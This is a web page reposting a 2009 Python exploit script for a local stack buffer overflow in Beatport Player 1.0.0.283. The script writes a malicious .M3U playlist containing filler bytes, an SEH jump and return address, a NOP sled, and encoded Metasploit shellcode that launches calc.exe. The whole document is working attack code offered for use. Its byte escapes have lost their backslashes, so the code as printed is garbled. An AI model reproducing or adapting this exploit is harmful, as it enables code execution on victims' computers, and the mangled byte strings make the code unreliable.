Home / os / win10

bpm3u2-overflow.txt

Posted on 03 May 2009

#exploit.py # # Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit # By: Encrypt3d.M!nd # # Tested on : Windows xp sp2 # chars = "x41" * 1232 ns = "xEBx06x90x90" sh = "x35x2FxD1x72" nops = "x90" * 20 # win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x30x42x30x42x50x4bx48x45x44x4ex43x4bx38x4ex47" "x45x50x4ax47x41x50x4fx4ex4bx58x4fx54x4ax41x4bx58" "x4fx35x42x32x41x30x4bx4ex49x34x4bx48x46x33x4bx38" "x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x48x42x4c" "x46x37x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x55x46x32x46x50x45x37x45x4ex4bx58" "x4fx55x46x42x41x50x4bx4ex48x36x4bx58x4ex50x4bx44" "x4bx38x4fx35x4ex41x41x30x4bx4ex4bx48x4ex51x4bx38" "x41x50x4bx4ex49x58x4ex55x46x52x46x30x43x4cx41x33" "x42x4cx46x36x4bx48x42x44x42x53x45x48x42x4cx4ax47" "x4ex50x4bx48x42x44x4ex50x4bx38x42x37x4ex41x4dx4a" "x4bx38x4ax36x4ax50x4bx4ex49x30x4bx38x42x38x42x4b" "x42x30x42x30x42x30x4bx58x4ax56x4ex33x4fx35x41x53" "x48x4fx42x56x48x55x49x58x4ax4fx43x48x42x4cx4bx37" "x42x35x4ax56x4fx4ex50x4cx42x4ex42x56x4ax46x4ax39" "x50x4fx4cx58x50x50x47x55x4fx4fx47x4ex43x46x41x36" "x4ex56x43x36x50x32x45x36x4ax37x45x56x42x50x5a") file=open('Devil_inside.m3u','w') file.write(chars+ns+sh+nops+shellcode) file.close()

 

TOP

Malware :